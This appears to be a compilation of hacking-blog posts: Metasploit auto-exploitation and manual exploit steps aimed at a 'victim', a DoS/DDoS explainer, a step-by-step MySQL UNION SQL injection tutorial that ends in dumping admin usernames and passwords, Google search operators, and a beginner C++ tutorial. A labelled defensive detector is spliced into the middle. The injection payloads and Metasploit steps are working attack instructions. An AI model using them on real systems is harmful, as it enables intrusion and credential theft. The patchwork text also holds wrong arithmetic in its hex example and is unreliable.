1: db_create (this will create the database needed for this attack)
2: nmap -sT -sV XXX.XXX.XXX.XXX (where XXX.XXX.XXX.XXX is the IP address of the victim)
Now give it time to scan, and when it is complete type the following command.
3: db_autopwn -p -t -e

This would start the penetration test, and the great thing about this is that it does not need any manual configuration. Everything will be done automatically, and if the test is successful a shell will be created.

How to Hack a computer using Metasploit ?

Metasploit is one of the greatest hacking tools ever. It makes hacking easy for script kiddies (new hackers). But the question is: how do you use it to hack a computer?

Metasploit Framework comes in a command-line as well as a GUI version. This article will deal with the command-line version. The following are the basic commands of Metasploit that you should learn by heart.

1: help (show the commands.)
2: show info XXXX (to show the information on the specified XXXX value, which can be an exploit or a payload)
3: show options (to show the options for an exploit and payload, like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit.)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch an exploit on the targeted machine.)

Note: To hack a computer using Metasploit, you should first have enough information about the target, including:
1: IP address
2: Open Ports
3: services running
4: Version of software running

All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.

Now the first step is choosing the right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example, if the computer is running an SMTP server on port 25 and there is an exploit for it, then you can hack that computer.

To choose an exploit, use the following command:

use [exploit path, e.g. exploit/windows/smtp/xxx]

Now you need a payload (a payload is a piece of program that will be executed if the vulnerability is exploited). To get a list of all the payloads available for the exploit, just type the following command.

show payloads

Now choose an appropriate payload from the list. The only thing left is to set the fields for the attack. A list of the most probable fields to be set is given below.

RHOST = The IP address of the computer to be attacked.
RPORT = The port of the service to be exploited (it is set by default)
LHOST = The IP address of your computer (it is set by default)
LPORT = The default port of your Metasploit program (it is set by default)

Now the last step is to type the following command and launch the attack on the computer.

exploit

After typing this command the attack will be launched, and if the vulnerability is successfully exploited the payload will be executed and a shell (you can think of it as a command prompt) will be launched, which will allow you to do anything with the computer that you have attacked.

The Difference Between a DoS and a DDoS Attack

DoS = Denial Of Service
DDoS = Distributed Denial Of Service

What is the difference between the two?
Whilst DoS and DDoS sound remarkably similar, there are in fact differences between the two:

DoS

A DoS Attack is a Denial of Service attack.
This means that one computer and one internet connection is used to flood a server with packets (TCP / UDP).
The point of such a denial of service attack is to overload the targeted server’s bandwidth and other resources.
This will make the server inaccessible to others, thereby blocking the website or whatever else is hosted there.

DDoS

A DDoS Attack is a Distributed Denial of Service Attack.
In most respects it is similar to a DoS attack but the results are much, much different.
Instead of one computer and one internet connection the DDoS attack utilises many computers and many connections.
The computers behind such an attack are often distributed around the whole world and will be part of what is known as a botnet.
The main difference between a DDoS attack vs a DoS attack, therefore, is that the target server will be overloaded by hundreds or even thousands of requests in the case of the former as opposed to just one attacker in the case of the latter.
Therefore it is much, much harder for a server to withstand a DDoS attack as opposed to the simpler DoS incursion.

How are Websites Hacked by SQL injection

Learn How To Hack Websites , Mysql Injection Tutorial
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial I will be showing you the steps to carry out the attack on a MySQL database.

Step 1

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5


Basically the site needs to have an = followed by a number or a string, most commonly a number. Once you have found a page like this, test for the vulnerability by simply entering a ' after the number in the URL. For example:

www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.



Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive a MySQL error at "order by 5", that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, replace the -- after the number with /*; they are two different prefixes, and if one works the other tends not to. Which prefix is used just depends on the way the database is configured.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put union all select 1,2,3,4,5,6,7--. If this is done successfully, the page should show a couple of numbers somewhere on the page, for example 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or, if these don't work, try...
@@user
@@version
@@database


For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 or above, read on to carry out the attack; if it is 4 or below, you have to brute-force or guess the table and column names. Programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember that "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database. Look for tables that may contain useful information such as passwords: admin, member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data. Say we want to get the "username" and "password" fields from the table "admin"; we would use the following command:
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you don't have to guess. If this command is successful, you should be presented with a page full of usernames and passwords from the website.
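A defender's view of steps 1 to 7, as an added example that is not part of the original tutorial: strict validation that rejects every parameter value shown above, plus a log-triage classifier that names which step a logged value matches. `is_valid_numeric_id`, `sqli_stage`, the stage labels and the sample values are assumptions constructed for illustration.

```cpp
#include <cctype>
#include <iostream>
#include <regex>
#include <string>
#include <utility>
#include <vector>

// Decode %XX and '+', then lowercase, so "ORDER%20BY" and "order+by" compare equal.
std::string url_decode_lower(const std::string& in) {
    std::string out;
    for (std::size_t i = 0; i < in.size(); ++i) {
        unsigned char c = static_cast<unsigned char>(in[i]);
        if (c == '%' && i + 2 < in.size() &&
            std::isxdigit(static_cast<unsigned char>(in[i + 1])) &&
            std::isxdigit(static_cast<unsigned char>(in[i + 2]))) {
            c = static_cast<unsigned char>(std::stoi(in.substr(i + 1, 2), nullptr, 16));
            i += 2;
        } else if (c == '+') {
            c = ' ';
        }
        out += static_cast<char>(std::tolower(c));
    }
    return out;
}

// Input validation for a numeric parameter (page=, id=): digits only, nothing else.
// Validation narrows the input; the query itself should still be parameterized.
bool is_valid_numeric_id(const std::string& raw_value) {
    static const std::regex digits(R"re(\d{1,9})re");
    return std::regex_match(raw_value, digits);
}

// Name the step of the walkthrough a parameter value matches, most specific first.
std::string sqli_stage(const std::string& raw_value) {
    static const std::vector<std::pair<std::string, std::regex>> rules = {
        {"schema-enumeration", std::regex(R"re(information_schema\.(tables|columns))re")},
        {"data-dump", std::regex(R"re(union\s+(all\s+)?select\b.*\bfrom\s+\w+)re")},
        {"fingerprint", std::regex(
             R"re(union\s+(all\s+)?select\b.*(user\(\)|database\(\)|version\(\)|@@\w+))re")},
        {"column-reflection", std::regex(R"re(union\s+(all\s+)?select\b)re")},
        {"column-count", std::regex(R"re(order\s+by\s+\d+)re")},
        {"quote-probe", std::regex(R"re(')re")},
    };
    const std::string v = url_decode_lower(raw_value);
    for (const auto& rule : rules)
        if (std::regex_search(v, rule.second)) return rule.first;
    return "none";
}

int main() {
    // Constructed parameter values, modelled on the request shapes in steps 1 to 7.
    const std::vector<std::string> samples = {
        "1", "1'", "1%20order%20by%205--", "1 union all select 1,2,3,4--",
        "1 union all select 1,user(),version(),4--",
        "1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--",
        "1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--",
    };
    for (const auto& s : samples)
        std::cout << (is_valid_numeric_id(s) ? "accept " : "reject ")
                  << sqli_stage(s) << "  <-  " << s << "\n";
    return 0;
}
```

In triage, the stage label indicates how far a probing session progressed: a run of column-count hits followed by a data-dump hit against the same page warrants a credential reset, not just a block rule.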

List of some Google Syntax for search

Calculator:
The next time you need to do a quick calculation, instead of bringing up the Calculator applet, you can just type your expression in to Google.
Example:
48512 * 1.02

Word Definitions:
If you need to quickly look up the definition of a word or phrase, simply use the “define:” command.
Example:
define:internet

intitle:
This Syntax restricts your search to the titles of web pages. The variation allintitle: finds pages wherein all the words specified appear in the title of the web page. Using allintitle: is basically the same as using the intitle: before each keyword.
examples:
intitle:"george bush"
allintitle:"money supply" economics

You may wish to avoid the allintitle: variation, because it doesn’t mix well with some of the other syntax elements.

intext:
This Syntax searches only body text (i.e., ignores link text, URLs, and titles). While its uses are limited, it’s perfect for finding query words that might be too common in URLs or link titles.
examples:
intext:"hackthenet.blogspot.com"
intext:html

There’s also an allintext: variation, but again, this doesn’t play well with others.

inanchor:
This Syntax searches for text in a page’s link anchors. A link anchor is the descriptive text of a link. For example, the link anchor in the HTML code
example:
inanchor:"hackthenet.blogspot.com"
As with other in*: syntax elements, there’s an allinanchor: variation, which works in a similar way (i.e., all the keywords specified must appear in a page’s link anchors).

link:
Lets you see which pages are linking to your Web page or to another page you’re interested in.
example:
link:http://hackthenet.blogspot.com

site:
This Syntax allows you to narrow your search by either a site or a top-level domain.
examples:
site:hackthenet.blogspot.com
site:edu
site:nc.us

inurl:
restricts your search to the URLs of web pages. This syntax tends to work well for finding search and help pages, because they tend to be rather regular in composition.
example:
inurl:help
You’ll see that using the inurl: query instead of the site: query has one immediate advantage: you can use it to search subdirectories. While the http:// prefix in a URL is ignored by Google when used with site:, search results come up short when including it in an inurl: query. Be sure to remove prefixes in any inurl: query for the best (read: any) results.

You can also use inurl: in combination with the site: syntax to draw out information on subdomains. For example, how many subdomains does google.com really have? A quick query will help you figure that out:
example:
site:google.com -inurl:www.google.com
This query asks Google to list all pages from the google.com domain, but leave out those pages which are from the common subdomain www, since you already know about that one.
Do you ever wonder how many subdomains Google has? I wondered!!!!

cache:
cache: finds a copy of the page that Google indexed even if that page is no longer available at its original URL or has since changed its content completely.
example:
cache:hackthenet.blogspot.com
If Google returns a result that appears to have little to do with your query, you’re almost sure to find what you’re looking for in the latest cached version of the page at Google. The Google cache is particularly useful for retrieving a previous version of a page that changes often.

filetype:
filetype: searches the suffixes or filename extensions. These are usually, but not necessarily, different file types; filetype:htm and filetype:html will give you different result counts, even though they’re the same file type. You can even search for different page generators—such as ASP, PHP, CGI, and so forth—presuming the site isn’t hiding them behind redirection and proxying. Google indexes several different Microsoft formats, including PowerPoint (.ppt), Excel (.xls), and Word (.doc).
examples:
"learn java" filetype:pdf
"IT books" filetype:doc

related:
related:, as you might expect, finds pages that are related to the specified page. This is a good way to find categories of pages; a search for related:google.com returns a variety of search engines, including Lycos, Yahoo!, and Northern Light.
examples:
related:www.yahoo.com
related:www.cnn.com
While an increasingly rare occurrence, you’ll find that not all pages are related to other pages.

info:
info: provides a page of links to more information about a specified URL. This information includes a link to the URL’s cache, a list of pages that link to the URL, pages that are related to the URL, and pages that contain the URL.
examples:
info:www.hackthenet.blogspot.com
info:www.nytimes.com/technology

Note that this information is dependent on whether Google has indexed the specified URL; if not, information will obviously be far more limited.

phonebook:
This syntax, as you might expect, looks up phone numbers.
examples:
phonebook:James Bond
phonebook:(511) 556-2725

Source: Google features

What is C++? And how to use it.



1. Introduction

1.1. Why do people program?
1.2. What is C++ & OOP?
1.3. What do I need to program?

2. Your first program


2.1. Running a C++ program
2.2. C++ program structure
2.3. Comments
2.4. Libraries
2.5. Functions
2.6. Streams
2.7. Return

3. Number Systems
3.1. Decimals
3.2. Binaries
3.3. Hexadecimals

4. Exercises

4.1. EX 1 : Running
4.2. EX 2 : Typing
4.3. EX 3 : Converting

5. What now?


5.1. Good programming sites
5.2. Good books on C++

6. What the hell it has to do with hacking.

--------------------------------------------------------------------------------


1.INTRODUCTION

1.1. Why do People Program?

Each person can have his own reason for programming but I can tell you that programming is one of the best ways to gain a deep understanding of computers and computer technology. Learning to program makes you understand why computers and computer programs work the way they do. It also puts some sense into you about how hard it is to create software.

1.2. What is C++ & OOP?

C++ is an extended version of C. C was developed at Bell Labs, in 1978. The purpose was to create a simple language (simpler than assembly & machine code...) which can be used on a variety of platforms. Later, in the early 1980s, C was extended to C++ to create an object-oriented language. O(bject) O(riented) P(rogramming) is a style of programming in which programs are made using classes. A class is code in a file separate from the main program - more on classes later. OOP in general & C++ in particular made it possible to handle the complexity of graphical environments (like Windows, Macintosh...).

1.3. What do I need to program?

Well, you need a computer and a compiler to start with, but you also need some curiosity and a lot of time. I guess(!?) you have a computer. You can find different compilers for free on Borland's website (check 5.1). If you have the curiosity but lack the time, read stuff during lessons and detention hours. Read whenever you find time. Having a good C++ book (check 5.2) also helps a lot (and is much better for your eyes). One thing not to forget: No tutorial, book, program or course makes you a programmer in 5 days. YOU make yourself a programmer. NO compiler writes an entire program for you, YOU write the program.

2. YOUR FIRST PROGRAM

2.1. Running a C++ Program


Read this part carefully: A C++ program must be compiled and linked before it can be executed, or run, on the computer. A great lot of compilers do this automatically. So what is a compiler? A compiler is a program that translates C++ code into machine language. Machine language is the language consisting of 1s and 0s, and is the native language of a computer. A typed C++ program is called the source-code, and the compiled code is called the object code.

Before the object code can be executed, it must be linked to other pieces of code (e.g. included libraries) used by the program. The compiled & linked program is called an executable file. Finally, the program is executed by the system. Its output is displayed in a window.

2.2. C++ Program Structure


All C++ progs contain statements (commands) that tell the computer what to do. Here is an example of a simple C++ program:
Code:
/* Downloaded from code.box.sk
We own you program */
#include <iostream>   // input/output stream library
using namespace std;  // lets us write cout instead of std::cout
int main()
{
    cout<<"We own you";          // the first statement
    return(0);                   // the second statement
}
Run the program. It should display :

We own you

The structure of a simple C++ program is:
Code:
/* Comments : Name, purpose of the program
    your name, date, etc.    */
    #include 
    int main()
    {
    statements; // comments
    return(0);
    }

Now we will have a closer look on the structure:

2.3. Comments
Comments are used to explain the contents of a program for a human reader. The computer ignores them. The symbols /* and */ are used for the beginning and end of a comment for multi-line comments. // symbols are also used for commenting. All characters on a line after the // symbol are considered to be comments and are ignored. Most newbies think that commenting a program is a waste of time. They are wrong. Commenting is very important because it makes the code understandable by other programmers and makes it easier to improve a program or fix the bugs in it. You'll understand better after trying to decipher a hundred pages of code you wrote a few months later.

2.4. Libraries

Look at the program above. Following the opening comment was the line:

#include <iostream>

This line simply tells the computer that the iostream library is needed and therefore should be included. A library is a collection of program code that can be included (and used) in a program to perform a variety of tasks. iostream is a library, also called a header file (older compilers name it iostream.h), used to perform input/output (I/O) stream tasks. There are a lot of non-commercial C++ libraries for various purposes written by good guys who spent more than enough time in front of their computers. You can find them at code.box.sk. References to all libraries used in the tutorials can also be found on the net.

2.5. Functions


The next line in the program was:

int main()

Which is the header of the main function. Makes sense? No? A function is a set of statements that accomplish a task. A function header includes the return type of the function and the function name. As shown in the main() header, main returns an integer (int) through return(0). So all functions that have an integer as the return type return integers. Very clear. The statements in a function (in this case the main function) are enclosed in curly braces. The { and } symbols indicate the beginning and the end of the statements. More on functions later.

2.6. Streams

What is a stream? In C++ input/output devices are called streams. cout (which we used above) is the c(onsole) out(put) stream, and the << send (insertion) operator is used to send the data "We own you" into the stream. In the first statement:

cout<<"We own you";

The words following the << operator are put in quotation marks(") to form a string. When run, the string We own you is sent to the console output device. Yes, it is also called the computer screen.

Important note: C++ is case sensitive. That means cout and Cout are not the same thing.

2.7. Return

The second statement was:

return(0);

which causes the program to terminate sending the value 0 to the computer. The value "0" indicates that the program terminated without error.

Note: Statements end with a semicolon ( ; ). A semicolon in C++ indicates the end of a statement.

3. DATA & NUMBER SYSTEMS

3.1. Decimals

The base 10 number system. Uses 10 digits: 0 to 9. Any number raised to the zero power is equal to one. For example: 5 to the power 0 = 1. Base ten equivalent of the numbers:

2600 = 2 x (10 to the power 3) + 6 x (10 to the power 2)
33 = 3 x (10 to the power 1) + 3 x (10 to the power 0)

3.2. Binaries

The base 2 number system. Uses 2 digits : 0 and 1. Works the same as base 10 except we multiply numbers by the powers of 2 instead. For example 110 is equal to 6 in base 10:

110 = 1 x (2 to the power 2) + 1 x (2 to the power 1) = 6(base10)

3.3. Hexadecimal


The base 16 number system. Uses 16 digits. 0 to 9 & "A" to "F". Works the same as base 10 & base two except the numbers are multiplied by the powers of 16 instead:

1B = 1 x (16 to the power 1) + 2(B) x (16 to the power of 0) = 30(base10)

4. EXERCISES

4.1. Running

Find & install a compiler, type the example program and run it. Pretty simple but be sure the syntax is correct.

4.2. Typing

Make a program which displays your name without looking to this tutorial. Makes you learn a lot better.

4.3. Converting

Convert these to decimals : 110101, 001101, 10101110
Convert these to hexadecimals : 234, 324, 19394
Convert these to binaries : 2F, 1B3, 234, 125


5. WHAT NOW?

5.1. Good programming related sites

Here are a few good sites about programming:

http://code.box.sk --> Very good content. Has message boards.
http://www.borland.com --> Free, shareware & commercial compilers.
http://www.cprogramming.com --> Some original tuts.
http://www.planet-source-code.com --> One of the biggest code archives.


5.2. Good books on C++


Printed:
C++ - How to Program: One of the best books written on C. Great for all levels of programming.
C++: The complete reference: An overall C++ & STL reference.
A Guide to Programming in C++, Lawrenceville Press: My first book on C++, "borrowed" lots of definitions from there  :)

Online books:
Thinking in C++ is nearly the best one on C++, a must-read. You can find many online netbooks from code.box.sk


6. What the hell it has to do with Hacking

First of all, you people should know that at this time you are called Script Kiddie Hackers, who use software written by others to hack. But to become an elite hacker you should know how to program, and C++ is a good language for that.

 